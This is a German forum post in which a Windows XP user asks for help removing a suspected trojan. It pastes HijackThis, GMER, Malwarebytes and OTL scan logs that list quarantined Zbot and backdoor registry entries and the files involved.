Trojaner/Virus wird nicht erkannt

Goljef · 03.12.2010, 16:09

Hallo, ich habe ein schwerwiegendes Problem mit einem Virus oder Trojaner. Ich bin nicht gerade ein Experte in diesen Dingen, wusste mir aber oft selbst zu helfen. Viele vorherige Probleme konnte ich u.a. auch mit diesem Board lösen, daher würde ich gerne dieses Mal persönlich diese Hilfe in Anspruch nehmen. Ich hoffe, ich bin auch in der richtigen Ecke mit diesem Post.

Aber zur Sache: Mein PC hat sich was eingefangen, was den PC sehr lahm macht, ich habe bei Durchläufen von Antivir auch einige Sachen finden können, die ich mittlerweile beseitigt habe.

Ein Problem konnte ich in einem Programm ausmachen, was sich in dem Verzeichnis C:\jdsfjsdijf.exe\ befand mit selbiger Bezeichnung. Der Malwarebytes-Schutz zeigt mir des Öfteren einen Tooltip an, bei dem folgende Adresse erwähnt wird: 188.95.159.23.

Eine Google-Suche brachte mich zu folgender Seite:w*w.threatexpert.com/report.aspx?md5=39d9faa6b50d9f3da6fe2389a8674bcd Dort hat der Ordner eine andere Bezeichnung, allerdings erinnerte der Ordner auf meinem PC an den des dort beschriebenen Trojaners.

Ich hab sämtliche Sachen durchgeführt, doch finde keine Lösung, den Schädling im Ordner konnte ich löschen und nachdem sich der Ordner nicht löschen ließ, habe ich ihn mit Problemen (der Abgesicherter Modus ließ sich nicht per F8 starten) im abges. Modus gelöscht. Darauf wollte ich noch einmal einen Virendurchlauf starten, doch bei Start des Programmes fing der PC wie eine Sirene an zu tönen. Der PC lief weiter, ich vermute, dass sich der immer noch auf meinem PC befindliche Schädling dazu hingerissen hat. Im normalen Modus ist bis jetzt alles normal.

Ich kann nun folgende Logs anbieten:

Code:

ATTFilter

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 15:29:59, on 03.12.2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\Avira\AntiVir Desktop\sched.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\OCZ Technology\Mouse\Amoumain.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Programme\Avira\AntiVir Desktop\avgnt.exe
C:\Programme\Gemeinsame Dateien\Java\Java Update\jusched.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programme\Avira\AntiVir Desktop\avguard.exe
C:\Programme\Gemeinsame Dateien\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Programme\Bonjour\mDNSResponder.exe
C:\Programme\Cisco Systems\VPN Client\cvpnd.exe
C:\Programme\Avira\AntiVir Desktop\avshadow.exe
C:\Programme\Java\jre6\bin\jqs.exe
C:\Programme\Malwarebytes' Anti-Malware\mbamservice.exe
C:\Programme\Gemeinsame Dateien\Marmiko Shared\MZCCntrl.exe
C:\Programme\Shutdown\service.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\wbem\wmiapsrv.exe
C:\Programme\Zone Labs\ZoneAlarm\zlclient.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\Programme\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Programme\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\msiexec.exe
C:\Programme\HijackThis\HijackThis.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: (no name) -  - (no file)
O2 - BHO: Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {399d96ca-6f9a-4fff-95fe-284e45ebb935} - (no file)
O2 - BHO: Windows Live Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: FDMIECookiesBHO Class - {CC59E0F9-7E43-44FA-9FAA-8377850BF205} - C:\Programme\Free Download Manager\iefdm2.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Programme\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O4 - HKLM\..\Run: [WheelMouse] C:\Programme\OCZ Technology\Mouse\Amoumain.exe
O4 - HKLM\..\Run: [{0228e555-4f9c-4e35-a3ec-b109a192b4c2}] C:\Programme\Gmail Notifier\gnotify.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [avgnt] "C:\Programme\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKLM\..\Run: [nwiz] nwiz.exe /installquiet
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [Adobe ARM] "C:\Programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Programme\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Programme\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programme\Gemeinsame Dateien\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [Malwarebytes' Anti-Malware] "C:\Programme\Malwarebytes' Anti-Malware\mbamgui.exe" /starttray
O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\PCHealth\HelpCtr\Binaries\MSConfig.exe /auto
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'LOKALER DIENST')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')
O8 - Extra context menu item: Alles mit FDM herunterladen - file://C:\Programme\Free Download Manager\dlall.htm
O8 - Extra context menu item: Auswahl mit FDM herunterladen - file://C:\Programme\Free Download Manager\dlselected.htm
O8 - Extra context menu item: Datei mit FDM herunterladen - file://C:\Programme\Free Download Manager\dllink.htm
O8 - Extra context menu item: Nach Microsoft E&xel exportieren - res://C:\PROGRA~1\MI69DF~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Videos mit FDM herunterladen - file://C:\Programme\Free Download Manager\dlfvideo.htm
O9 - Extra button: ICQ7.2 - {72EFBFE4-C74F-4187-AEFD-73EA3BE968D6} - C:\Programme\ICQ7.2\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ7.2 - {72EFBFE4-C74F-4187-AEFD-73EA3BE968D6} - C:\Programme\ICQ7.2\ICQ.exe
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI69DF~1\Office12\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O10 - Unknown file in Winsock LSP: c:\windows\system32\nwprovau.dll
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O18 - Protocol: navnet - {AD6E5643-7B0C-46AA-95AD-9773FF2A857A} - G:\Wichtige Programme\NavNetApp\ComUtilities.dll
O23 - Service: Avira AntiVir Planer (AntiVirSchedulerService) - Avira GmbH - C:\Programme\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - C:\Programme\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Programme\Gemeinsame Dateien\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour-Dienst (Bonjour Service) - Apple Inc. - C:\Programme\Bonjour\mDNSResponder.exe
O23 - Service: Cisco Systems, Inc. VPN Service (CVPND) - Cisco Systems, Inc. - C:\Programme\Cisco Systems\VPN Client\cvpnd.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: iPod-Dienst (iPod Service) - Apple Inc. - C:\Programme\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Programme\Java\jre6\bin\jqs.exe
O23 - Service: MBAMService - Malwarebytes Corporation - C:\Programme\Malwarebytes' Anti-Malware\mbamservice.exe
O23 - Service: MSCSPTISRV - Sony Corporation - C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\MSCSPTISRV.exe
O23 - Service: T-Online WLAN Adapter Steuerungsdienst (MZCCntrl) - Deutsche Telekom AG, Marmiko IT-Solutions GmbH - C:\Programme\Gemeinsame Dateien\Marmiko Shared\MZCCntrl.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PACSPTISVR - Unknown owner - C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\PACSPTISVR.exe
O23 - Service: RichiStudios Shutdown (RSShutdown) - RichiStudios - C:\Programme\Shutdown\service.exe
O23 - Service: ServiceLayer - Nokia - C:\Programme\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: SonicStage Back-End Service - Sony Corporation - C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\SsBeSvc.exe
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\SPTISRV.exe
O23 - Service: SonicStage SCSI Service (SSScsiSV) - Sony Corporation - C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\SSScsiSV.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Check Point Software Technologies LTD - C:\WINDOWS\system32\ZoneLabs\vsmon.exe

--
End of file - 9141 bytes

Code:

ATTFilter

GMER 1.0.15.15530 - hxxp://www.gmer.net
Rootkit quick scan 2010-12-03 15:00:47
Windows 5.1.2600 Service Pack 3 Harddisk0\DR0 -> \Device\Ide\IdeDeviceP2T0L0-7 ST3500320AS rev.SD15
Running: 4o5fmmny.exe; Driver: C:\DOKUME~1\***\LOKALE~1\Temp\pxtdapob.sys


---- System - GMER 1.0.15 ----

SSDT    sptd.sys                                                      ZwEnumerateKey [0xB7EC3FB2]
SSDT    sptd.sys                                                      ZwEnumerateValueKey [0xB7EC4340]

---- Devices - GMER 1.0.15 ----

Device  \Driver\atapi \Device\Ide\IdeDeviceP3T0L0-12                  [B7E37B40] atapi.sys[unknown section] {MOV EDX, [ESP+0x8]; LEA ECX, [ESP+0x4]; PUSH EAX; MOV EAX, ESP; PUSH EAX}
Device  \Driver\atapi \Device\Ide\IdeDeviceP3T0L0-12                  sfsync02.sys (StarForce Protection Synchronization Driver/Protection Technology)
Device  \Driver\atapi \Device\Ide\IdePort0                            [B7E37B40] atapi.sys[unknown section] {MOV EDX, [ESP+0x8]; LEA ECX, [ESP+0x4]; PUSH EAX; MOV EAX, ESP; PUSH EAX}
Device  \Driver\atapi \Device\Ide\IdePort0                            sfsync02.sys (StarForce Protection Synchronization Driver/Protection Technology)
Device  \Driver\atapi \Device\Ide\IdePort1                            [B7E37B40] atapi.sys[unknown section] {MOV EDX, [ESP+0x8]; LEA ECX, [ESP+0x4]; PUSH EAX; MOV EAX, ESP; PUSH EAX}
Device  \Driver\atapi \Device\Ide\IdePort1                            sfsync02.sys (StarForce Protection Synchronization Driver/Protection Technology)
Device  \Driver\atapi \Device\Ide\IdePort2                            [B7E37B40] atapi.sys[unknown section] {MOV EDX, [ESP+0x8]; LEA ECX, [ESP+0x4]; PUSH EAX; MOV EAX, ESP; PUSH EAX}
Device  \Driver\atapi \Device\Ide\IdePort2                            sfsync02.sys (StarForce Protection Synchronization Driver/Protection Technology)
Device  \Driver\atapi \Device\Ide\IdeDeviceP2T0L0-7                   [B7E37B40] atapi.sys[unknown section] {MOV EDX, [ESP+0x8]; LEA ECX, [ESP+0x4]; PUSH EAX; MOV EAX, ESP; PUSH EAX}
Device  \Driver\atapi \Device\Ide\IdeDeviceP2T0L0-7                   sfsync02.sys (StarForce Protection Synchronization Driver/Protection Technology)
Device  \Driver\atapi \Device\Ide\IdePort3                            [B7E37B40] atapi.sys[unknown section] {MOV EDX, [ESP+0x8]; LEA ECX, [ESP+0x4]; PUSH EAX; MOV EAX, ESP; PUSH EAX}
Device  \Driver\atapi \Device\Ide\IdePort3                            sfsync02.sys (StarForce Protection Synchronization Driver/Protection Technology)
Device  \Driver\atapi \Device\Ide\IdePort4                            [B7E37B40] atapi.sys[unknown section] {MOV EDX, [ESP+0x8]; LEA ECX, [ESP+0x4]; PUSH EAX; MOV EAX, ESP; PUSH EAX}
Device  \Driver\atapi \Device\Ide\IdePort4                            sfsync02.sys (StarForce Protection Synchronization Driver/Protection Technology)
Device  \Driver\atapi \Device\Ide\IdePort5                            [B7E37B40] atapi.sys[unknown section] {MOV EDX, [ESP+0x8]; LEA ECX, [ESP+0x4]; PUSH EAX; MOV EAX, ESP; PUSH EAX}
Device  \Driver\atapi \Device\Ide\IdePort5                            sfsync02.sys (StarForce Protection Synchronization Driver/Protection Technology)
Device  \Driver\akolwrus \Device\Scsi\akolwrus1Port6Path0Target0Lun0  8A4441E8
Device  \Driver\akolwrus \Device\Scsi\akolwrus1Port6Path0Target0Lun0  sfsync02.sys (StarForce Protection Synchronization Driver/Protection Technology)
Device  \Driver\akolwrus \Device\Scsi\akolwrus1                       8A4441E8
Device  \Driver\akolwrus \Device\Scsi\akolwrus1                       sfsync02.sys (StarForce Protection Synchronization Driver/Protection Technology)
Device  \FileSystem\Ntfs \Ntfs                                        8A7011E8
Device  \Driver\Tcpip \Device\Ip                                      vsdatant.sys (ZoneAlarm Firewalling Driver/Check Point Software Technologies LTD)
Device  \Driver\Tcpip \Device\Tcp                                     vsdatant.sys (ZoneAlarm Firewalling Driver/Check Point Software Technologies LTD)
Device  \Driver\Tcpip \Device\Udp                                     vsdatant.sys (ZoneAlarm Firewalling Driver/Check Point Software Technologies LTD)
Device  \Driver\Tcpip \Device\RawIp                                   vsdatant.sys (ZoneAlarm Firewalling Driver/Check Point Software Technologies LTD)

---- EOF - GMER 1.0.15 ----

Code:

ATTFilter

Infizierte Registrierungsschlüssel: 1
Infizierte Registrierungswerte: 1
Infizierte Dateiobjekte der Registrierung: 2
Infizierte Verzeichnisse: 1
Infizierte Dateien: 2

Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel:
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} (Trojan.Zbot) -> Quarantined and deleted successfully.

Infizierte Registrierungswerte:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\UID (Malware.Trace) -> Value: UID -> Quarantined and deleted successfully.

Infizierte Dateiobjekte der Registrierung:
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\(default) (Hijack.StartMenuInternet) -> Bad: ("C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\av.exe" /START "C:\Programme\Internet Explorer\iexplore.exe") Good: (iexplore.exe) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Hijack.UserInit) -> Bad: (C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,) Good: (userinit.exe) -> Quarantined and deleted successfully.

Infizierte Verzeichnisse:
c:\WINDOWS\system32\lowsec (Stolen.data) -> Quarantined and deleted successfully.

Infizierte Dateien:
c:\WINDOWS\system32\lowsec\local.ds (Stolen.data) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\lowsec\user.ds (Stolen.data) -> Quarantined and deleted successfully.

Code:

ATTFilter

Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 2

Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel:
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\{19127AD2-394B-70F5-C650-B97867BAA1F7} (Backdoor.Bot) -> Quarantined and deleted successfully.
HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\{19127AD2-394B-70F5-C650-B97867BAA1F7} (Backdoor.Bot) -> Quarantined and deleted successfully.
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\{494E6CEC-7483-A4EE-0938-895519A84BC7} (Backdoor.Bot) -> Quarantined and deleted successfully.
HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\{494E6CEC-7483-A4EE-0938-895519A84BC7} (Backdoor.Bot) -> Quarantined and deleted successfully.

Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)

Infizierte Dateien:
c:\dokumente und einstellungen\***\lokale einstellungen\Temp\upd7.tmp (Spyware.Passwords.XGen) -> Quarantined and deleted successfully.
c:\jdsfjsdijf.exe\jdsfjsdijf.exe (Spyware.Passwords.XGen) -> Quarantined and deleted successfully.

Code:

ATTFilter

OTL logfile created on: 03.12.2010 15:56:34 - Run 3
OTL by OldTimer - Version 3.2.17.3     Folder = G:\Downloads
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
 
3,00 Gb Total Physical Memory | 2,00 Gb Available Physical Memory | 72,00% Memory free
5,00 Gb Paging File | 4,00 Gb Available in Paging File | 85,00% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Programme
Drive C: | 146,48 Gb Total Space | 106,13 Gb Free Space | 72,45% Space Free | Partition Type: NTFS
Drive E: | 97,65 Gb Total Space | 12,22 Gb Free Space | 12,51% Space Free | Partition Type: NTFS
Drive F: | 123,96 Gb Total Space | 70,36 Gb Free Space | 56,76% Space Free | Partition Type: NTFS
Drive G: | 97,65 Gb Total Space | 34,72 Gb Free Space | 35,56% Space Free | Partition Type: NTFS
 
Computer Name: LORDI | User Name: *** | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - G:\Downloads\OTL.exe (OldTimer Tools)
PRC - C:\Programme\Malwarebytes' Anti-Malware\mbamservice.exe (Malwarebytes Corporation)
PRC - C:\Programme\Malwarebytes' Anti-Malware\mbam.exe (Malwarebytes Corporation)
PRC - C:\Programme\Malwarebytes' Anti-Malware\mbamgui.exe (Malwarebytes Corporation)
PRC - C:\Programme\Avira\AntiVir Desktop\sched.exe (Avira GmbH)
PRC - C:\Programme\Avira\AntiVir Desktop\avgnt.exe (Avira GmbH)
PRC - C:\Programme\Avira\AntiVir Desktop\avguard.exe (Avira GmbH)
PRC - C:\Programme\Mozilla Firefox\firefox.exe (Mozilla Corporation)
PRC - C:\Programme\Microsoft Office 2007\Office12\WINWORD.EXE (Microsoft Corporation)
PRC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe (Check Point Software Technologies LTD)
PRC - C:\Programme\Zone Labs\ZoneAlarm\zlclient.exe (Check Point Software Technologies LTD)
PRC - C:\Programme\Gemeinsame Dateien\Java\Java Update\jusched.exe (Sun Microsystems, Inc.)
PRC - C:\Programme\Avira\AntiVir Desktop\avshadow.exe (Avira GmbH)
PRC - C:\Programme\Cisco Systems\VPN Client\cvpnd.exe (Cisco Systems, Inc.)
PRC - C:\Programme\Gemeinsame Dateien\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe (Apple Inc.)
PRC - C:\WINDOWS\explorer.exe (Microsoft Corporation)
PRC - C:\Programme\Gemeinsame Dateien\Marmiko Shared\MZCCntrl.exe (Deutsche Telekom AG, Marmiko IT-Solutions GmbH)
PRC - C:\Programme\OCZ Technology\Mouse\Amoumain.exe ()
PRC - C:\Programme\Shutdown\Service.exe (RichiStudios)
 
 
========== Modules (SafeList) ==========
 
MOD - G:\Downloads\OTL.exe (OldTimer Tools)
MOD - C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll (Microsoft Corporation)
MOD - C:\WINDOWS\system32\winsta.dll (Microsoft Corporation)
MOD - C:\WINDOWS\system32\wtsapi32.dll (Microsoft Corporation)
 
 
========== Win32 Services (SafeList) ==========
 
SRV - (HidServ) -- C:\WINDOWS\System32\hidserv.dll File not found
SRV - (AppMgmt) -- C:\WINDOWS\System32\appmgmts.dll File not found
SRV - (MBAMService) -- C:\Programme\Malwarebytes' Anti-Malware\mbamservice.exe (Malwarebytes Corporation)
SRV - (AntiVirSchedulerService) -- C:\Programme\Avira\AntiVir Desktop\sched.exe (Avira GmbH)
SRV - (AntiVirService) -- C:\Programme\Avira\AntiVir Desktop\avguard.exe (Avira GmbH)
SRV - (vsmon) -- C:\WINDOWS\System32\ZoneLabs\vsmon.exe (Check Point Software Technologies LTD)
SRV - (ServiceLayer) -- C:\Programme\PC Connectivity Solution\ServiceLayer.exe (Nokia)
SRV - (CVPND) -- C:\Programme\Cisco Systems\VPN Client\cvpnd.exe (Cisco Systems, Inc.)
SRV - (odserv) -- C:\Programme\Gemeinsame Dateien\Microsoft Shared\OFFICE12\ODSERV.EXE (Microsoft Corporation)
SRV - (Apple Mobile Device) -- C:\Programme\Gemeinsame Dateien\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe (Apple Inc.)
SRV - (SSScsiSV) -- C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\SSScsiSV.exe (Sony Corporation)
SRV - (SonicStage Back-End Service) -- C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\SsBeSvc.exe (Sony Corporation)
SRV - (MZCCntrl) -- C:\Programme\Gemeinsame Dateien\Marmiko Shared\MZCCntrl.exe (Deutsche Telekom AG, Marmiko IT-Solutions GmbH)
SRV - (MSCSPTISRV) -- C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\MSCSPTISRV.exe (Sony Corporation)
SRV - (SPTISRV) -- C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\SPTISRV.exe (Sony Corporation)
SRV - (PACSPTISVR) -- C:\Programme\Gemeinsame Dateien\Sony Shared\AVLib\PACSPTISVR.exe ()
SRV - (ose) -- C:\Programme\Gemeinsame Dateien\Microsoft Shared\Source Engine\OSE.EXE (Microsoft Corporation)
SRV - (IDriverT) -- C:\Programme\Gemeinsame Dateien\InstallShield\Driver\1150\Intel 32\IDriverT.exe (Macrovision Corporation)
SRV - (RSShutdown) -- C:\Programme\Shutdown\Service.exe (RichiStudios)
 
 
========== Driver Services (SafeList) ==========
 
DRV - (wanatw) WAN Miniport (ATW) -- C:\WINDOWS\System32\DRIVERS\wanatw4.sys File not found
DRV - (SSHDRV84) -- C:\WINDOWS\System32\drivers\SSHDRV84.sys File not found
DRV - (Amfilter) -- C:\WINDOWS\System32\DRIVERS\Amfilter.sys File not found
DRV - (ALLOW-IO) -- D:\ALLOW-IO.sys File not found
DRV - (MBAMProtector) -- C:\WINDOWS\system32\drivers\mbam.sys (Malwarebytes Corporation)
DRV - (avgntflt) -- C:\WINDOWS\system32\drivers\avgntflt.sys (Avira GmbH)
DRV - (avipbb) -- C:\WINDOWS\system32\drivers\avipbb.sys (Avira GmbH)
DRV - (vsdatant) -- C:\WINDOWS\system32\vsdatant.sys (Check Point Software Technologies LTD)
DRV - (UsbserFilt) -- C:\WINDOWS\system32\drivers\usbser_lowerfltj.sys (Nokia)
DRV - (upperdev) -- C:\WINDOWS\system32\drivers\usbser_lowerflt.sys (Nokia)
DRV - (nmwcdc) -- C:\WINDOWS\system32\drivers\ccdcmbo.sys (Nokia)
DRV - (nmwcd) -- C:\WINDOWS\system32\drivers\ccdcmb.sys (Nokia)
DRV - (nmwcdnsu) -- C:\WINDOWS\system32\drivers\nmwcdnsu.sys (Nokia)
DRV - (nmwcdnsuc) -- C:\WINDOWS\system32\drivers\nmwcdnsuc.sys (Nokia)
DRV - (nv) -- C:\WINDOWS\system32\drivers\nv4_mini.sys (NVIDIA Corporation)
DRV - (CVPNDRVA) -- C:\WINDOWS\system32\drivers\CVPNDRVA.sys (Cisco Systems, Inc.)
DRV - (atksgt) -- C:\WINDOWS\system32\drivers\atksgt.sys ()
DRV - (lirsgt) -- C:\WINDOWS\system32\drivers\lirsgt.sys ()
DRV - (ssmdrv) -- C:\WINDOWS\system32\drivers\ssmdrv.sys (Avira GmbH)
DRV - (avgio) -- C:\Programme\Avira\AntiVir Desktop\avgio.sys (Avira GmbH)
DRV - (acedrv11) -- C:\WINDOWS\system32\drivers\acedrv11.sys (Protect Software GmbH)
DRV - (sptd) -- C:\WINDOWS\System32\Drivers\sptd.sys ()
DRV - (DNE) -- C:\WINDOWS\system32\drivers\dne2000.sys (Deterministic Networks, Inc.)
DRV - (pccsmcfd) -- C:\WINDOWS\system32\drivers\pccsmcfd.sys (Nokia)
DRV - (ASCTRM) -- C:\WINDOWS\System32\drivers\asctrm.sys (Windows (R) 2000 DDK provider)
DRV - (IntcAzAudAddService) Service for Realtek HD Audio (WDM) -- C:\WINDOWS\system32\drivers\RtkHDAud.sys (Realtek Semiconductor Corp.)
DRV - (nm) -- C:\WINDOWS\system32\drivers\nmnt.sys (Microsoft Corporation)
DRV - (lbrtfdc) -- C:\WINDOWS\System32\drivers\lbrtfdc.sys (Toshiba Corp.)
DRV - (CVirtA) -- C:\WINDOWS\system32\drivers\CVirtA.sys (Cisco Systems, Inc.)
DRV - (Amusbprt) -- C:\WINDOWS\system32\drivers\Amusbprt.sys (OCZ Technology Co.,Ltd.)
DRV - (yukonwxp) -- C:\WINDOWS\system32\drivers\yk51x86.sys (Marvell)
DRV - (MIINPazX) -- C:\Programme\Gemeinsame Dateien\Marmiko Shared\MInfraIS\miinpazx.sys (Deutsche Telekom AG, Marmiko IT-Solutions GmbH)
DRV - (MTOnlPktAlyX) -- C:\Programme\T-Online\T-Online_Software_6\Basis-Software\Basis1\mtonlpktalyx.sys (Deutsche Telekom AG AG, Marmiko IT-Solutions GmbH)
DRV - (MACNDIS5) -- C:\Programme\Gemeinsame Dateien\Marmiko Shared\macndis5.sys (Marmiko IT-Solutions GmbH)
DRV - (BVRPMPR5) -- C:\WINDOWS\system32\drivers\bvrpmpr5.sys (BVRP Software)
